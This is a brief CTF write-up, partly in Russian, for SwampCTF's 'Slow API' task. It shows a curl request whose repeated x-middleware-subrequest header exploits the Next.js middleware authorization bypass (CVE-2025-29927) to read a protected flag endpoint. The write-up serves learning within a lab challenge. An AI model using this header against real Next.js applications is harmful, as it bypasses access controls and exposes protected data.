Tags: swampctf
Rating: 3.0
SwampCTF
Task: Slow API
эксплуатируется уязвимость Next.js
`https://jfrog.com/blog/cve-2025-29927-next-js-authorization-bypass/`
Закрыт прямой доступ к флагу ответ 401
эксплуатирую уязвимость через curl
```
curl -v 'http://chals.swampctf.com:43611/api/protected/flag' \
-H 'x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware'```
